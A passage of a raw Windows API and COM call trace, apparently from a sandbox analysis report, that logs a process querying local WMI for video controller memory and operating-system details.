ppvObject=0x36e9d4 | out: ppvObject=0x36e9d4*=0x768cf8) returned 0x0 [0214.701] WbemDefPath:IUnknown:QueryInterface (in: This=0x768cf8, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e988 | out: ppvObject=0x36e988*=0x0) returned 0x80004002 [0214.701] WbemDefPath:IUnknown:AddRef (This=0x768cf8) returned 0x3 [0214.701] WbemDefPath:IUnknown:QueryInterface (in: This=0x768cf8, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e2e4 | out: ppvObject=0x36e2e4*=0x0) returned 0x80004002 [0214.701] WbemDefPath:IUnknown:QueryInterface (in: This=0x768cf8, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e294 | out: ppvObject=0x36e294*=0x0) returned 0x80004002 [0214.701] WbemDefPath:IUnknown:QueryInterface (in: This=0x768cf8, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e2a0 | out: ppvObject=0x36e2a0*=0x5e89140) returned 0x0 [0214.701] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5e89140, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e2a8 | out: pCid=0x36e2a8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0214.701] WbemDefPath:IUnknown:Release (This=0x5e89140) returned 0x3 [0214.701] CoGetContextToken (in: pToken=0x36e300 | out: pToken=0x36e300) returned 0x0 [0214.702] CoGetContextToken (in: pToken=0x36e714 | out: pToken=0x36e714) returned 0x0 [0214.702] WbemDefPath:IUnknown:QueryInterface (in: This=0x768cf8, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e794 | out: ppvObject=0x36e794*=0x0) returned 0x80004002 [0214.702] WbemDefPath:IUnknown:Release (This=0x768cf8) returned 0x2 [0214.702] WbemDefPath:IUnknown:Release (This=0x768cf8) returned 0x1 [0214.702] CoGetContextToken (in: pToken=0x36f0ac | out: pToken=0x36f0ac) returned 0x0 [0214.702] CoGetContextToken (in: pToken=0x36f00c | out: pToken=0x36f00c) returned 0x0 [0214.702] WbemDefPath:IUnknown:QueryInterface (in: This=0x768cf8, riid=0x36f0dc*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f0d8 | out: ppvObject=0x36f0d8*=0x768cf8) returned 0x0 [0214.702] WbemDefPath:IUnknown:AddRef (This=0x768cf8) returned 0x3 [0214.702] WbemDefPath:IUnknown:Release (This=0x768cf8) returned 0x2 [0214.702] WbemDefPath:IWbemPath:SetText (This=0x768cf8, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\ROOT\\CIMV2:Win32_VideoController.DeviceID=\"VideoController1\"") returned 0x0 [0214.702] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768ba8, puCount=0x36f254 | out: puCount=0x36f254*=0x2) returned 0x0 [0214.702] WbemDefPath:IWbemPath:GetText (in: This=0x768ba8, lFlags=4, puBuffLength=0x36f250*=0x0, pszText=0x0 | out: puBuffLength=0x36f250*=0xf, pszText=0x0) returned 0x0 [0214.702] WbemDefPath:IWbemPath:GetText (in: This=0x768ba8, lFlags=4, puBuffLength=0x36f250*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f250*=0xf, pszText="\\\\.\\root\\CIMV2") returned 0x0 [0214.702] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768ba8, puCount=0x36f220 | out: puCount=0x36f220*=0x2) returned 0x0 [0214.702] WbemDefPath:IWbemPath:GetText (in: This=0x768ba8, lFlags=4, puBuffLength=0x36f21c*=0x0, pszText=0x0 | out: puBuffLength=0x36f21c*=0xf, pszText=0x0) returned 0x0 [0214.702] WbemDefPath:IWbemPath:GetText (in: This=0x768ba8, lFlags=4, puBuffLength=0x36f21c*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f21c*=0xf, pszText="\\\\.\\root\\CIMV2") returned 0x0 [0214.702] IWbemClassObject:Get (in: This=0x5e88a80, wszName="AdapterRAM", lFlags=0, pVal=0x36f21c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x24520e8*=0, plFlavor=0x24520ec*=0 | out: pVal=0x36f21c*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x24520e8*=19, plFlavor=0x24520ec*=0) returned 0x0 [0214.703] IWbemClassObject:Get (in: This=0x5e88a80, wszName="AdapterRAM", lFlags=0, pVal=0x36f224*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x24520e8*=19, plFlavor=0x24520ec*=0 | out: pVal=0x36f224*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x24520e8*=19, plFlavor=0x24520ec*=0) returned 0x0 [0214.703] CoTaskMemAlloc (cb=0x4) returned 0x5e89170 [0214.703] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x5e89170, puReturned=0x24518b0 | out: apObjects=0x5e89170*=0x0, puReturned=0x24518b0*=0x0) returned 0x1 [0214.704] CoTaskMemFree (pv=0x5e89170) [0214.704] CoGetContextToken (in: pToken=0x36f14c | out: pToken=0x36f14c) returned 0x0 [0214.705] IUnknown:Release (This=0x70f9f0) returned 0x1 [0214.705] IUnknown:Release (This=0x70f9f0) returned 0x0 [0214.706] CoGetContextToken (in: pToken=0x36f14c | out: pToken=0x36f14c) returned 0x0 [0214.706] IUnknown:Release (This=0x70f928) returned 0x1 [0214.706] IUnknown:Release (This=0x70f928) returned 0x0 [0214.787] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f24c | out: puCount=0x36f24c*=0x2) returned 0x0 [0214.787] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f248*=0x0, pszText=0x0 | out: puBuffLength=0x36f248*=0xf, pszText=0x0) returned 0x0 [0214.787] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f248*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f248*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.788] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f1d4 | out: ppv=0x36f1d4*=0x6ee4bc) returned 0x0 [0214.788] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f1cc | out: pAptType=0x36f1cc*=1) returned 0x0 [0214.788] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f1d0 | out: ppvObject=0x36f1d0*=0x0) returned 0x80004002 [0214.788] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0214.789] CoGetClassObject (in: rclsid=0x761b14*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36edf0 | out: ppv=0x36edf0*=0x787e00) returned 0x0 [0214.789] WbemLocator:IUnknown:QueryInterface (in: This=0x787e00, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36f008 | out: ppvObject=0x36f008*=0x0) returned 0x80004002 [0214.789] WbemLocator:IClassFactory:CreateInstance (in: This=0x787e00, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36f014 | out: ppvObject=0x36f014*=0x5e89170) returned 0x0 [0214.789] WbemLocator:IUnknown:Release (This=0x787e00) returned 0x0 [0214.789] WbemLocator:IUnknown:QueryInterface (in: This=0x5e89170, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ec34 | out: ppvObject=0x36ec34*=0x5e89170) returned 0x0 [0214.789] WbemLocator:IUnknown:QueryInterface (in: This=0x5e89170, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36ebe8 | out: ppvObject=0x36ebe8*=0x0) returned 0x80004002 [0214.790] WbemLocator:IUnknown:AddRef (This=0x5e89170) returned 0x3 [0214.790] WbemLocator:IUnknown:QueryInterface (in: This=0x5e89170, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e544 | out: ppvObject=0x36e544*=0x0) returned 0x80004002 [0214.790] WbemLocator:IUnknown:QueryInterface (in: This=0x5e89170, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e4f4 | out: ppvObject=0x36e4f4*=0x0) returned 0x80004002 [0214.790] WbemLocator:IUnknown:QueryInterface (in: This=0x5e89170, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e500 | out: ppvObject=0x36e500*=0x0) returned 0x80004002 [0214.790] CoGetContextToken (in: pToken=0x36e560 | out: pToken=0x36e560) returned 0x0 [0214.790] CoGetContextToken (in: pToken=0x36e974 | out: pToken=0x36e974) returned 0x0 [0214.790] WbemLocator:IUnknown:QueryInterface (in: This=0x5e89170, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e9f4 | out: ppvObject=0x36e9f4*=0x0) returned 0x80004002 [0214.790] WbemLocator:IUnknown:Release (This=0x5e89170) returned 0x2 [0214.790] WbemLocator:IUnknown:Release (This=0x5e89170) returned 0x1 [0214.790] CoGetContextToken (in: pToken=0x36eff4 | out: pToken=0x36eff4) returned 0x0 [0214.790] CoGetContextToken (in: pToken=0x36ef54 | out: pToken=0x36ef54) returned 0x0 [0214.790] WbemLocator:IUnknown:QueryInterface (in: This=0x5e89170, riid=0x36f024*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36f020 | out: ppvObject=0x36f020*=0x5e89170) returned 0x0 [0214.790] WbemLocator:IUnknown:AddRef (This=0x5e89170) returned 0x3 [0214.790] WbemLocator:IUnknown:Release (This=0x5e89170) returned 0x2 [0214.790] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1b0 | out: puCount=0x36f1b0*=0x2) returned 0x0 [0214.790] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=8, puBuffLength=0x36f1ac*=0x0, pszText=0x0 | out: puBuffLength=0x36f1ac*=0xf, pszText=0x0) returned 0x0 [0214.790] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=8, puBuffLength=0x36f1ac*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1ac*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.790] CoCreateInstance (in: rclsid=0x727c3734*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x727c3794*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x36f05c | out: ppv=0x36f05c*=0x5e890f0) returned 0x0 [0214.791] WbemLocator:IWbemLocator:ConnectServer (in: This=0x5e890f0, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x36f0fc | out: ppNamespace=0x36f0fc*=0x792a68) returned 0x0 [0214.895] WbemLocator:IUnknown:QueryInterface (in: This=0x792a68, riid=0x727c35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ef80 | out: ppvObject=0x36ef80*=0x784d04) returned 0x0 [0214.895] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x784d04, pProxy=0x792a68, pAuthnSvc=0x36efd0, pAuthzSvc=0x36efcc, pServerPrincName=0x36efc4, pAuthnLevel=0x36efc8, pImpLevel=0x36efb8, pAuthInfo=0x36efbc, pCapabilites=0x36efc0 | out: pAuthnSvc=0x36efd0*=0xa, pAuthzSvc=0x36efcc*=0x0, pServerPrincName=0x36efc4, pAuthnLevel=0x36efc8*=0x6, pImpLevel=0x36efb8*=0x2, pAuthInfo=0x36efbc, pCapabilites=0x36efc0*=0x1) returned 0x0 [0214.895] WbemLocator:IUnknown:Release (This=0x784d04) returned 0x1 [0214.895] WbemLocator:IUnknown:QueryInterface (in: This=0x792a68, riid=0x727c35a4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ef74 | out: ppvObject=0x36ef74*=0x784d24) returned 0x0 [0214.895] WbemLocator:IUnknown:QueryInterface (in: This=0x792a68, riid=0x727c35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ef60 | out: ppvObject=0x36ef60*=0x784d04) returned 0x0 [0214.895] WbemLocator:IClientSecurity:SetBlanket (This=0x784d04, pProxy=0x792a68, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0214.896] WbemLocator:IUnknown:Release (This=0x784d04) returned 0x2 [0214.896] WbemLocator:IUnknown:Release (This=0x784d24) returned 0x1 [0214.896] CoTaskMemFree (pv=0x793ee8) [0214.896] WbemLocator:IUnknown:AddRef (This=0x792a68) returned 0x2 [0214.896] WbemLocator:IUnknown:Release (This=0x5e890f0) returned 0x0 [0214.897] CoGetContextToken (in: pToken=0x36e4b4 | out: pToken=0x36e4b4) returned 0x0 [0214.897] CoGetContextToken (in: pToken=0x36e8c4 | out: pToken=0x36e8c4) returned 0x0 [0214.897] WbemLocator:IUnknown:QueryInterface (in: This=0x792a68, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e860 | out: ppvObject=0x36e860*=0x784d0c) returned 0x0 [0214.897] WbemLocator:IRpcOptions:Query (in: This=0x784d0c, pPrx=0x787e90, dwProperty=2, pdwValue=0x36e954 | out: pdwValue=0x36e954) returned 0x80004002 [0214.897] WbemLocator:IUnknown:Release (This=0x784d0c) returned 0x2 [0214.897] CoGetContextToken (in: pToken=0x36ee94 | out: pToken=0x36ee94) returned 0x0 [0214.898] CoGetContextToken (in: pToken=0x36edf4 | out: pToken=0x36edf4) returned 0x0 [0214.898] WbemLocator:IUnknown:QueryInterface (in: This=0x792a68, riid=0x36eec4*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x36ed90 | out: ppvObject=0x36ed90*=0x792a68) returned 0x0 [0214.898] WbemLocator:IUnknown:Release (This=0x792a68) returned 0x2 [0214.898] SysStringLen (param_1=0x0) returned 0x0 [0214.898] CoGetContextToken (in: pToken=0x36efac | out: pToken=0x36efac) returned 0x0 [0214.898] IWbemServices:ExecQuery (in: This=0x792a68, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_OperatingSystem", lFlags=16, pCtx=0x0, ppEnum=0x36f1bc | out: ppEnum=0x36f1bc*=0x70f928) returned 0x0 [0214.903] IUnknown:QueryInterface (in: This=0x70f928, riid=0x727c35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36f00c | out: ppvObject=0x36f00c*=0x70f92c) returned 0x0 [0214.903] IClientSecurity:QueryBlanket (in: This=0x70f92c, pProxy=0x70f928, pAuthnSvc=0x36f05c, pAuthzSvc=0x36f058, pServerPrincName=0x36f050, pAuthnLevel=0x36f054, pImpLevel=0x36f044, pAuthInfo=0x36f048, pCapabilites=0x36f04c | out: pAuthnSvc=0x36f05c*=0xa, pAuthzSvc=0x36f058*=0x0, pServerPrincName=0x36f050, pAuthnLevel=0x36f054*=0x6, pImpLevel=0x36f044*=0x2, pAuthInfo=0x36f048, pCapabilites=0x36f04c*=0x1) returned 0x0 [0214.903] IUnknown:Release (This=0x70f92c) returned 0x1 [0214.903] IUnknown:QueryInterface (in: This=0x70f928, riid=0x727c35a4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36f000 | out: ppvObject=0x36f000*=0x784a54) returned 0x0 [0214.903] IUnknown:QueryInterface (in: This=0x70f928, riid=0x727c35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36efec | out: ppvObject=0x36efec*=0x70f92c) returned 0x0 [0214.903] IClientSecurity:SetBlanket (This=0x70f92c, pProxy=0x70f928, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0214.913] IUnknown:Release (This=0x70f92c) returned 0x2 [0214.913] WbemLocator:IUnknown:Release (This=0x784a54) returned 0x1 [0214.913] CoTaskMemFree (pv=0x793f18) [0214.914] IUnknown:AddRef (This=0x70f928) returned 0x2 [0214.914] CoGetContextToken (in: pToken=0x36e52c | out: pToken=0x36e52c) returned 0x0 [0214.914] CoGetContextToken (in: pToken=0x36e93c | out: pToken=0x36e93c) returned 0x0 [0214.914] IUnknown:QueryInterface (in: This=0x70f928, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e8d8 | out: ppvObject=0x36e8d8*=0x784a3c) returned 0x0 [0214.915] WbemLocator:IRpcOptions:Query (in: This=0x784a3c, pPrx=0x787d40, dwProperty=2, pdwValue=0x36e9cc | out: pdwValue=0x36e9cc) returned 0x80004002 [0214.915] WbemLocator:IUnknown:Release (This=0x784a3c) returned 0x2 [0214.915] CoGetContextToken (in: pToken=0x36ef0c | out: pToken=0x36ef0c) returned 0x0 [0214.915] CoGetContextToken (in: pToken=0x36ee6c | out: pToken=0x36ee6c) returned 0x0 [0214.915] IUnknown:QueryInterface (in: This=0x70f928, riid=0x36ef3c*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x36ee08 | out: ppvObject=0x36ee08*=0x70f928) returned 0x0 [0214.915] IUnknown:Release (This=0x70f928) returned 0x2 [0214.915] SysStringLen (param_1=0x0) returned 0x0 [0214.916] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f208 | out: puCount=0x36f208*=0x2) returned 0x0 [0214.916] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f204*=0x0, pszText=0x0 | out: puBuffLength=0x36f204*=0xf, pszText=0x0) returned 0x0 [0214.916] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.916] CoGetContextToken (in: pToken=0x36f05c | out: pToken=0x36f05c) returned 0x0 [0214.916] IEnumWbemClassObject:Clone (in: This=0x70f928, ppEnum=0x36f214 | out: ppEnum=0x36f214*=0x70f9f0) returned 0x0 [0214.917] IUnknown:QueryInterface (in: This=0x70f9f0, riid=0x727c35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36f0d0 | out: ppvObject=0x36f0d0*=0x70f9f4) returned 0x0 [0214.917] IClientSecurity:QueryBlanket (in: This=0x70f9f4, pProxy=0x70f9f0, pAuthnSvc=0x36f120, pAuthzSvc=0x36f11c, pServerPrincName=0x36f114, pAuthnLevel=0x36f118, pImpLevel=0x36f108, pAuthInfo=0x36f10c, pCapabilites=0x36f110 | out: pAuthnSvc=0x36f120*=0xa, pAuthzSvc=0x36f11c*=0x0, pServerPrincName=0x36f114, pAuthnLevel=0x36f118*=0x6, pImpLevel=0x36f108*=0x2, pAuthInfo=0x36f10c, pCapabilites=0x36f110*=0x1) returned 0x0 [0214.917] IUnknown:Release (This=0x70f9f4) returned 0x1 [0214.918] IUnknown:QueryInterface (in: This=0x70f9f0, riid=0x727c35a4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36f0c4 | out: ppvObject=0x36f0c4*=0x784f04) returned 0x0 [0214.918] IUnknown:QueryInterface (in: This=0x70f9f0, riid=0x727c35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36f0b0 | out: ppvObject=0x36f0b0*=0x70f9f4) returned 0x0 [0214.918] IClientSecurity:SetBlanket (This=0x70f9f4, pProxy=0x70f9f0, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0214.920] IUnknown:Release (This=0x70f9f4) returned 0x2 [0214.920] WbemLocator:IUnknown:Release (This=0x784f04) returned 0x1 [0214.920] CoTaskMemFree (pv=0x793f48) [0214.920] IUnknown:AddRef (This=0x70f9f0) returned 0x2 [0214.921] CoGetContextToken (in: pToken=0x36e5e0 | out: pToken=0x36e5e0) returned 0x0 [0214.921] CoGetContextToken (in: pToken=0x36e9f4 | out: pToken=0x36e9f4) returned 0x0 [0214.921] IUnknown:QueryInterface (in: This=0x70f9f0, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e98c | out: ppvObject=0x36e98c*=0x784eec) returned 0x0 [0214.921] WbemLocator:IRpcOptions:Query (in: This=0x784eec, pPrx=0x787fb0, dwProperty=2, pdwValue=0x36ea80 | out: pdwValue=0x36ea80) returned 0x80004002 [0214.921] WbemLocator:IUnknown:Release (This=0x784eec) returned 0x2 [0214.921] CoGetContextToken (in: pToken=0x36efc4 | out: pToken=0x36efc4) returned 0x0 [0214.921] CoGetContextToken (in: pToken=0x36ef24 | out: pToken=0x36ef24) returned 0x0 [0214.922] IUnknown:QueryInterface (in: This=0x70f9f0, riid=0x36eff4*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x36eec0 | out: ppvObject=0x36eec0*=0x70f9f0) returned 0x0 [0214.922] IUnknown:Release (This=0x70f9f0) returned 0x2 [0214.922] SysStringLen (param_1=0x0) returned 0x0 [0214.922] IEnumWbemClassObject:Reset (This=0x70f9f0) returned 0x0 [0214.923] CoTaskMemAlloc (cb=0x4) returned 0x769398 [0214.923] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x769398, puReturned=0x2452d38 | out: apObjects=0x769398*=0x5e8a320, puReturned=0x2452d38*=0x1) returned 0x0 [0214.930] IUnknown:QueryInterface (in: This=0x5e8a320, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e86c | out: ppvObject=0x36e86c*=0x5e8a320) returned 0x0 [0214.930] IUnknown:QueryInterface (in: This=0x5e8a320, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e820 | out: ppvObject=0x36e820*=0x0) returned 0x80004002 [0214.930] IUnknown:QueryInterface (in: This=0x5e8a320, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36e648 | out: ppvObject=0x36e648*=0x0) returned 0x80004002 [0214.930] IUnknown:AddRef (This=0x5e8a320) returned 0x3 [0214.930] IUnknown:QueryInterface (in: This=0x5e8a320, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e17c | out: ppvObject=0x36e17c*=0x0) returned 0x80004002 [0214.930] IUnknown:QueryInterface (in: This=0x5e8a320, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, 